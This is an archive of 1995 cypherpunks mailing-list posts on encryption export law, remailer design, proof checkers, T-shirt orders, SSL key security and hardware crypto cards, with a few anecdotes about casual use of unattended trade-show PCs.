In-Reply-To: <199508070138.SAA12404@ns.via.net>
Message-ID: <199508071422.KAA10423@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe McGuckin writes:
> A client of mine wishes to set up a connection to their
> Singapore office using the internet rather than a dedicated 
> leased line.
> 
> They would like to encrypt the data going between the branch
> office in Singapore and the home office in California. 
> 
> I am considering using something like swIPe for this? Seem reasonable?

Probably for the next month or so since IPSEC implementations aren't
out. (Well, actually, Morningstar is already reportedly offering them
to selected test customers but that might not be true -- in any case
they can't export.) swIPe won't do what you want out of the box
anyway, though.

> Also, what are the legal ramifications? Can I get an export license 
> for this?

Doubtful, but I believe swIPe is on overseas sites already.

> Is there an encryption method that doesn't require an
> export license?

None you care to use.

> Is swIPe legal? That is, are any patents being misappropriated by the
> current version?

No.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Mon, 7 Aug 95 08:07:11 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: RSA/Perl Shirts
Message-ID: <Pine.SUN.3.91.950807110621.14512A-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Has Joel Furr shipped his shirts yet?

I see some people on the list have gotten shirts and i was wondering as 
I still have not gotten mine.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 7 Aug 95 08:23:12 PDT
To: cypherpunks@toad.com
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <ac4b096d0102100487ad@[205.199.118.202]>
Message-ID: <9508071521.AA10100@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



All this quibbling about the "validity" of proof checkers is philosophically
inept. It is a basic property of logic that it proceeds from axioms to
conclusions. No proposition can be understood except by reference to some
other proposition.

It is not possible to objectively observe anything, all observation is made
through a mechanism which is imperfectly analysed and thus the observation
is subjective to the extent that the interpretation is unknown.

We may obtain an objective statement from a subjective observation by reference
to the source of subjectivity. If however the subjective assumptions are shared 
by all participants within the system of being any statement which follows from 
only those assumptions may be regarded as objective. Objectivity is thus not
an atomic fact but a relation, a fact cannot have the property of objectivity 
except with respect to a system of being.

[Thus I may assert 1+1=2 as an objective fact since the assumptions upon which
it is based are commonly shared. If however someone wished to question this
statement (e.g. phenomological bracketing) then in the context of that 
discussion I would accept it as being subjective).]


The question of prooving the proof checker is thus an extension of a more 
fundamental problem, providing proof of proof. Since a proof is a fact and facts 
are subjective except with resepct to a system of being the demand for proof of 
consistency of proof is an extension of the requirements for proof as normally 
understood. 

The requirement for "prooving" a program is thus significantly less onerous than 
asserted. It is not necessary to provide a trancendental proof, merely to 
establish consistency with respect to a commonly accepted set of axioms.


	Phill Hallam-Baker



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 7 Aug 95 08:36:32 PDT
To: cypherpunks@toad.com
Subject: Re: ACLU Opposes Exon-Like Speech Crimes in Managers Amend. to House Telco Bill
In-Reply-To: <199508050036.RAA18410@comsec.com>
Message-ID: <9508071534.AA19224@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Thu, 3 Aug 1995 11:06:19 -0400
>From: ACLUNATL@aol.com

>					The amendment would have the
>effect of actually usurping control from parents in favor of a government
>approval panel.

Anecdote:

	I was in Cambridge MA this past weekend visiting old friends, some
at church.  I sat across from one such at lunch -- a young guy up from
Texas going on about how good it is that people are fighting cyberporn.

	I brought up parental control in attempted rebuttal and he switched
immediately to the idea that `parents usually *are* the child abusers and
we need to protect children from them -- not give parents control over what
gets communicated electronically'.

	I was surprised at the speed with which he switched to that line of
thought.  It's clear that this chess game opening has been played by or
around him before.

	[Come to think of it now, it's completely consistent with the
anti-abortion stand: that children (starting at fetus) are the property of
Society and parents are required to serve Society as soon as a child is
conceived (or perhaps as soon as they start having sex).  If it's child
abusers you're talking about, that line of reasoning can carry emotional
appeal.  However, I lived in Utah at a time when it was illegal for parents
to instruct their children about birth control (I was told (I didn't read
the law personally.)).]

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 7 Aug 95 09:04:17 PDT
To: cypherpunks@toad.com
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <9508071521.AA10100@zorch.w3.org>
Message-ID: <9508071603.AA19197@all.net>
MIME-Version: 1.0
Content-Type: text


> All this quibbling about the "validity" of proof checkers is philosophically
> inept. It is a basic property of logic that it proceeds from axioms to
> conclusions. No proposition can be understood except by reference to some
> other proposition.

Except that it all starts with language and developes through set theory.

> It is not possible to objectively observe anything, all observation is made
> through a mechanism which is imperfectly analysed and thus the observation
> is subjective to the extent that the interpretation is unknown.

And yet it is all based on observations at the initial set theoretic level.

> We may obtain an objective statement from a subjective observation by reference
> to the source of subjectivity. If however the subjective assumptions are shared 
> by all participants within the system of being any statement which follows from 
> only those assumptions may be regarded as objective. Objectivity is thus not
> an atomic fact but a relation, a fact cannot have the property of objectivity 
> except with respect to a system of being.

And indded, we are people which gives us some common context.

> [Thus I may assert 1+1=2 as an objective fact since the assumptions upon which
> it is based are commonly shared. If however someone wished to question this
> statement (e.g. phenomological bracketing) then in the context of that 
> discussion I would accept it as being subjective).]

I was taught 1+1=1 in boolean algebra.

> The question of prooving the proof checker is thus an extension of a more 
> fundamental problem, providing proof of proof. Since a proof is a fact and facts 
> are subjective except with resepct to a system of being the demand for proof of 
> consistency of proof is an extension of the requirements for proof as normally 
> understood. 

But in computers, we are living in a mathematically defined system
(except for physical issues which have been suppressed to a very large
extent by the design of statistically low error-rate systems) which
follows very precisely the logic of its design.  Thus proofs work since
we are working in this well formed domain.

> The requirement for "prooving" a program is thus significantly less onerous than 
> asserted. It is not necessary to provide a trancendental proof, merely to 
> establish consistency with respect to a commonly accepted set of axioms.

More specifically, within the logic dictated by the hardware designed to assure
that the system remains within the mathematical structure defined by its design.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Quazi F. Haque" <qfh1@crux3.cit.cornell.edu>
Date: Mon, 7 Aug 95 09:49:48 PDT
To: John Young <jya@pipeline.com>
Subject: Re: JIL_ted
In-Reply-To: <199508051212.IAA26627@pipe3.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.950807124840.5606B-100000@crux3.cit.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain




  Quazi F Haque  | Those that can give up essential liberty to obtain a little
qfh1@cornell.edu | temporary safety deserve neither liberty nor safety. - BF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tfs@adc.com (Tony F Sgarlatti)
Date: Mon, 7 Aug 95 10:53:00 PDT
To: kelly@netcom.com
Subject: Re: Over 350 'Munitions T-shirts' Shipped
Message-ID: <9508071751.AA09815@ohtar>
MIME-Version: 1.0
Content-Type: text/plain


> Where are mine...I got the money to you via
> Mario wojo???? at SUN...
> I ordered 8 of the shirts
> BTW
> I am the publisher of PGP 1.0 the only person
> who will be indicted with Phil or alone for PGP
> what about MY defense fund????
> 
> Check Gov Access for my story

Could you be a little more specific regarding your URL?  Thanks!

*******************************************************************************
* Just say know!                Tony Sgarlatti            thetruth@future.net *
******************************************************************************* 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 7 Aug 95 09:53:38 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <ac4b096d0102100487ad@[205.199.118.202]>
Message-ID: <199508071653.MAA03355@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Phill Hallam-Baker summarized it best. I advise anyone interested in this
issue to read up on pancritical rationalism (a favorite extropian topic of
debate). "The Retreat to Commitement" by Bartley (?, sorry, can't recall
at the moment, the book is not with me) is a good writeup of the subject.
At the lowest level, even the basic axioms can be cricitized.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Schultz <jschultz@mail.coin.missouri.edu>
Date: Mon, 7 Aug 95 11:25:56 PDT
To: "Rev. Ben" <samman@CS.YALE.EDU>
Subject: Re: RSA/Perl Shirts
In-Reply-To: <Pine.SUN.3.91.950807110621.14512A-100000@frog.zoo2.cs.yale.edu>
Message-ID: <Pine.SOL.3.91.950807131928.168A-100000@coinc0>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Aug 1995, Rev. Ben wrote:
> Has Joel Furr shipped his shirts yet?
> 
> I see some people on the list have gotten shirts and i was wondering as 
> I still have not gotten mine.

I was wondering the same thing myself.  I know my check was cashed over a 
month ago, but no shirt has arrived.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Mon, 7 Aug 95 11:22:58 PDT
To: cypherpunks@toad.com
Subject: addresses
Message-ID: <01HTSKP4C88Y8ZDVMP@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


thanks much to all who responded to my query on the 
problem i was having with the strange address.

i think i have more than enough information to resolve 
this problem.

amp
*********************************************
*          / Only God can see the whole     *
*  O[%\%\%{<>===========================-   *
*          \ Mandlebrot Set at Once!        *
* amp                                       *
* <0003701548@mcimail.com>                  *
* <alan.pugh@internetmci.com>               *
* PGP Key = 4A2683C1                        *
*********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 7 Aug 95 10:41:53 PDT
To: solman@MIT.EDU
Subject: Re: RSA has been proved correct
In-Reply-To: <9508050806.AA22214@ua.MIT.EDU>
Message-ID: <m0sfWAM-0009yuC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> Given the enormous difficulty of ensuring security in a world of
> ubiquitous distributed computing, I'm as big a fan as any of formal
> methods. But Tim's post hammers home the big fault of formal methods:
> the possibility that people will come to rely upon them. I have

"Logic is a system whereby one may go wrong with confidence." - Patterson

...
> 
> Cheers,
> 
> JWS
> 

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Mon, 7 Aug 95 12:35:52 PDT
To: cypherpunks@toad.com
Subject: www remailer interface
Message-ID: <199508071935.OAA24824@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



c'punks,

Please check out the new www remailer interface at 

http://miso.wwa.com/~dochobbs/cpremailer.html

It is based on nate's code with one addition for security
and contains info from other places.

I would appreciate some visits and comments/criticisms
before I place it in the general population.  Again,
give it a thorough test because I want it to be good 
and secure for me and those using it.

It's in its final testing phase (mainly because I haven't
got the news instructions just the way I want them) and
will be set to go soon.  I am, of course, sending this 
message through the page.

Michael Hobbs
dochobbs@wwa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 7 Aug 95 12:05:21 PDT
To: rsaeuro@sourcery.demon.co.uk
Subject: Re: ANNOUNCE:- RSAEURO Version 1.00
In-Reply-To: <12@sourcery.demon.co.uk>
Message-ID: <199508071904.PAA21608@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just wanted to publicly thank Stephen Kapp for writing this.  Its
long past time RSAREF was re-created outside the USA.  Also, this
toolkit will be useful to those of us in the USA in about 5 years.

Thanks, Stephen!

You wrote:

| RSAEURO is a cryptographic toolkit providing various functions for the use
| of digital signatures, data encryption and supporting areas (PEM 
| encoding, random number generation etc).  To aid compatibility with 
| existing software, RSAEURO is call-compatible with RSADSI's "RSAREF(tm)" 
| toolkit. RSAEURO allows non-US residents to make use of much of the 
| cryptographic software previously only (legally) available in the US.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Mon, 7 Aug 95 13:10:18 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: "The Net"
In-Reply-To: <Pine.BSD/.3.91.950807151937.11218A-100000@escape.com>
Message-ID: <9508072009.AA17336@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes
>Well, the loopback is only a single IP address.  If they used that, every 
>net.entity would have the same IP.  Not too good. :-)

Nope.  *Any* IP address starting with 127 is a host loopback address
and shouldn't appear outside the host.  This from the "Assigned
Numbers" RFC (STD 2).

127.0.0.1 is only convention.  It's the "first" loopback address.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 12:34:25 PDT
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: "The Net"
In-Reply-To: <9o809c19w165w@bwalk.dm.com>
Message-ID: <Pine.BSD/.3.91.950807151937.11218A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Dr. Dimitri Vulis wrote:

> I once was a consultant at a small financial services firm, and a (young,
> disturbed) user was going around playing stupid pranks on unattended PCs. I
> mandated the use of screenblankers that kicked in after 3 minutes of inactivity
> and required a password to get back. The user would then reboot the PCs; some
> password was needed to get onto the LAN, but he'd mess with the local
> config.sys's. He eventually got fired and I do something else.

Unfortunatly, the lusers here are brain-dead and don't care about 
anything.  They don't even know the first things about DOS.  We do have a 
couple of geniuses who think they know Windoze (or want to learn it) who 
occasionally play with the icons and groups: one such genious once closed 
a group window, then claimed someone "erased it."  What a dork!  The 
worse is that I have to clean up after them no matter how stupid they are.


> I guess byte values>255 are the IP equivalent of 555. Better than 127.0.0.1 -
> someone might telnet to 127.0.0.1, then ask mgm/ua whose address this is. :)

Well, the loopback is only a single IP address.  If they used that, every 
net.entity would have the same IP.  Not too good. :-)

> My 6yr-old's IBM Aptiva comes with a sound board and the software that reads
> English text and pronounces it in much more lifelike manner than the gizmo in
> the movie. That gizmo sounded annoyingly computer-like, but had intonations
> obviously coming from a human actor.

Nope, sounded right the like the Apple MacinTalk II Pro voices.  They've 
got some really cool voices, some even human sounding.  Check it out if 
you get a chance.  Real intonations: you can hear the voice flex, etc.  
There are some voices that follow songs or other tones.  (i.e. Big Ben, 
Bells, etc.)  They sound like they're singing.

> The notion is very realistic (but the flashy displays in the movie were not).
> At the recent PC Expo at the Javitz Center in NYC, there were tens of PCs
> running various Web browsers to try out. No one was watching over most of them.
> I entered the URL telnet://uunet.uu.net:119, and sure enough, got connected.
> It accepted 'IHAVE', but I was too lazy to type in an entire Usenet article.
> I (and the heroine) could have telnetted to someone's port 25 just as easily.

Yep.  Those be the same machines where I dropped my Cypherpunx PC EXPO 
V2.0 disks.  Just left a few dozen infront of each machine as I used 
them.  Sort of the sleight of hand that theives use to lift stuff; only I 
didn't take, I put. >;-)


> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Say, what's on this BBS anyway... (send me email, enough noise on this list.)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 7 Aug 95 12:31:39 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: ACLU Opposes Exon-Like Speech Crimes in Managers Amend. to House Telco Bill
In-Reply-To: <9508071534.AA19224@tis.com>
Message-ID: <Pine.SUN.3.91.950807152525.16169H-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Aug 1995, Carl Ellison wrote:

> Anecdote:
> 
> 	I was in Cambridge MA this past weekend visiting old friends, some
> at church.  I sat across from one such at lunch -- a young guy up from
> Texas going on about how good it is that people are fighting cyberporn.
> 
> 	I brought up parental control in attempted rebuttal and he switched
> immediately to the idea that `parents usually *are* the child abusers and
> we need to protect children from them -- not give parents control over what
> gets communicated electronically'.
> 
> 	I was surprised at the speed with which he switched to that line of
> thought.  It's clear that this chess game opening has been played by or
> around him before.

I suppose it was pointless to point out (in this case, not in general 
public debate) that parents who are child abusers have no need to use the 
Internet to acquire victims?  Two totally, completely, absolutely 
different questions.

Or am I missing something?
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 13:19:05 PDT
To: Matt Miszewski <crypto@midex.com>
Subject: Re: MS Money password problem
In-Reply-To: <Pine.3.89.9508062007.A19303-0100000@shaq.midex.com>
Message-ID: <Pine.BSD/.3.91.950807160839.11218R-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Aug 1995, Matt Miszewski wrote:

> We recently lost (ok fired) our office manager, but not before she put 
> nifty passwords on all the MS Money data we had and now she has, of 
> course, gone on a three week vacation.  I have all the relevant WP 
> password retrieving mechanisms but not one for MS Money.
> 
> Anyone with pointers or programs, your help would be greatly appreciated.

Welp, good luck to you.  Of course, this should be a great huge reminder 
of why BACKUPS are important.  If you have a backup of the data >BEFORE< 
she locked it, you only lost anything entered from between the date of 
the backup and "today."

Tim of course has a point.  Strong crypto isn't breakable.  Don't know 
what MS Money uses... :-(

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 13:21:47 PDT
To: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <199508040003.SAA12916@bvsd.k12.co.us>
Message-ID: <Pine.BSD/.3.91.950807161207.11218U-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Ian S. Nelson wrote:

> > // Ray, you may want to forward this to the list.
   ^^^^ THIS IS WHY :-)  The original poster of this asked me to post it 
to this list for him.  Why? Cause I run a filtered cypherpunks service to 
which he subscribes - he wanted me to forward this to the real list, so I 
did.  Since it's contents is not-quite-crypto related, you see "Noise:" 
in the subject.

> 
> Why am I seeing this with the cp list?
> 

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 13:32:41 PDT
To: Don Henson <dhenson@itsnet.com>
Subject: Re: Over 350 'Munitions T-shirts' Shipped
In-Reply-To: <199508071416.IAA14134@scratchy.itsnet.com>
Message-ID: <Pine.BSD/.3.91.950807161751.11218V-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know if the ones printed by Joe Furr have/will be mailed soon?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dochobbs@wwa.com (Michael D. Hobbs)
Date: Mon, 7 Aug 95 14:19:36 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: www remailer interface
Message-ID: <m0sfZa3-000FTwC@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


It has been stated, 

:I'm a bit uncomfortable about the hardwiring of a particular remailer into
:the chain, according to the Web page
:
:	"Select your remailers [...] Your mail will be automatically sent
:	 to the remailer hfinney@shell.portal.com and at least one other
:	 remailer that you choose."
:
:(Nothing personal, Hal :)
:
:Why was this done ?
:
:-Futplex

The code was written to be used with a local remailer that
then sends it along the others that the sender chooses. I
modified it so that I don't need to establish my own remailer
by sending it to hfinney@shell.portal.com.

I think this might provide better security for the sender due
to the fact that you are forced to chain your letter thus
providing more security.  The argument can be made that if the
initial hardwired remailer is compromised that this removes 
all security.  I chose hfinney because 

1. the turnaround time is good.  I wanted the first to be fast
because it is basically 'insurance' for the sender.

2. it was a remailer that I am familiar with and has been around
(in remailer server time) awhile.

3. it was the one that I personally felt most comfortable with
using as the hardwired mailer.

Granted these might not be the best reasons, but this is the
kind of response I was looking for.  I can solve the problem
by either

1. removing the hardwired

2. removing the hardwired and forcing you to chain

3. keep the hardwired in and use some 'established' remailer or
one the group can come to a consensus on.

Responses appreciated.  I will gladly distibute the code if
desired.  Like the page states, it was originally written
by Nate Sammons, but I can change it as needed.


_____________________________________________________________
dochobbs@wwa.com	M.D. Hobbs	mhobbs@rad.rpslmc.edu
http://miso.wwa.com/~dochobbs		finger for my pgp key
I am human and nothing human do I count alien.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 7 Aug 95 13:31:16 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: www remailer interface
In-Reply-To: <199508071935.OAA24824@ valhalla.phoenix.net>
Message-ID: <9508072031.AA08118@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous/Michael Hobbs writes:
> Please check out the new www remailer interface at 
> 
> http://miso.wwa.com/~dochobbs/cpremailer.html
[...]
> I would appreciate some visits and comments/criticisms
> before I place it in the general population.  

I'm a bit uncomfortable about the hardwiring of a particular remailer into
the chain, according to the Web page:

	"Select your remailers [...] Your mail will be automatically sent
	 to the remailer hfinney@shell.portal.com and at least one other
	 remailer that you choose."

(Nothing personal, Hal :)

Why was this done ?

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 7 Aug 95 14:08:14 PDT
To: altitude@cic.net (Alex Tang)
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508040455.AAA18486@petrified.cic.net>
Message-ID: <199508072107.RAA22991@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| > As SSL has some intrinsic points of weakness, I don't see the point
| > of sticking to it to secure the TCP layer.
| 
| just wondering but...What are the intrinsic points of weakness?  

	As Bruce Schneier reminded people in his keynote at Defcon,
its easier to steal the keys than to break the cryptosystem.  Web
servers tend to be far too big and bulky to be trusted with
cryptographic keys.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 7 Aug 95 14:24:45 PDT
To: cypherpunks@toad.com
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <9508071603.AA19197@all.net>
Message-ID: <9508072123.AA17396@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> All this quibbling about the "validity" of proof checkers is philosophically
>> inept. It is a basic property of logic that it proceeds from axioms to
>> conclusions. No proposition can be understood except by reference to some
>> other proposition.

>Except that it all starts with language and developes through set theory.

That is not necessarily the case. It all starts with communication of which 
language is a form, logic is a more perfect form of communication because its 
validity is most widely shared. 

It is perfectly consistent to deny the supremacy opf logic. Wittgenstein was 
wrong to assert that it is impossible to step outside the logical framework. The 
mind may be characterised by logical inferences but that does not mean that it 
is bounded by logical inferences. The observer might take a hallucinatory drug 
for example and thereby participate in an extra-logical ontology.

>And yet it is all based on observations at the initial set theoretic level.

Only if you accept that the logical positivists were right and that there is no 
thought that cannot be characterised in that manner. The problem with this 
approach is that it prevents consideration of the real issue which philosophy 
should consider, the questions of being, time and spirit. We might conisder that 
the logical positivists found and aswer to the wrong question while the 
continetal school found an unsatisfactory anwer to the right one.

>And indded, we are people which gives us some common context.

Exactly we can communicate because we participate within the same system of 
being and that provides sufficient common reference points for us to convince 
ourselves that we are communicating the same ideas. We cannot prove that we are 
in fact achieiving this goal for we cannot objectively determine that we both 
observe the same things.

>> The question of prooving the proof checker is thus an extension of a more 
>> fundamental problem, providing proof of proof. Since a proof is a fact and 
facts 
>> are subjective except with resepct to a system of being the demand for proof 
of 
>> consistency of proof is an extension of the requirements for proof as 
normally 
>> understood. 

>But in computers, we are living in a mathematically defined system
>(except for physical issues which have been suppressed to a very large
>extent by the design of statistically low error-rate systems) which
>follows very precisely the logic of its design.  Thus proofs work since
>we are working in this well formed domain.

But that mathematically defined system is still subject to the constraint that 
we cannot analyse the thing in itself. Instead we must step outside the system 
to analyse it. We do not in fact define LISP in LISP what we actually do is to 
define LISP in a language that looks like LISP and demonstrate that the two are 
compatible. 

It is important to distinguish a demonstration of meta-consistency from a proof 
within the logic of that logic. We might assert correctly that a program have 
been proven correct using a proof checker. We do not need to explain that the 
proof is of correctness with respect to a set of axioms for that is the nature 
of proof and is thus no more necessary when considering proofs of computer 
programs than of any other type of proofs. The meta-form of this proof is "A 
Therefore B where B is independent of A". We cannot however assert that we have 
used the program checker to prove itself. That would have a meta-form "A 
Therefore A". This form does not contain any information.

The only meta form of A concerning A that carries information is "A Therefore 
(not A)". 
This implies that A is false. Thus although it is not possible to 
prove A true it is possible to prove it false.


		Phill Hallam-Baker
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 7 Aug 95 17:19:57 PDT
To: cypherpunks@toad.com
Subject: Where to find Internet growth stats?
Message-ID: <v02120d06ac4c6bfa9939@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I read in a speech by Rutkowski that the latest Internet growth stats are
published twice a month. I search at the Internet Society site, and other
usual suspects, but to no avail. URL, anyone?

TIA,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 7 Aug 95 17:49:18 PDT
To: cypherpunks@toad.com
Subject: hardware encryption
Message-ID: <v02120d10ac4c71ff42bd@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I'm looking for add-in cards that implement DES and/or RSA
for either a PC (ISA/EISA/whatever) or a Sun (S-Bus),
preferably a Sun. Also, the RSA card would need to implement
a 1024 bit modulus.

Any tips or pointers? I've got the list of chip makers in
_Applied Cryptography_, but the ones I've contacted so far
don't seem to know anything about cards, even if they admit
that they have the chips.

Thanks,

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dorab Patel <dorab@twinsun.com>
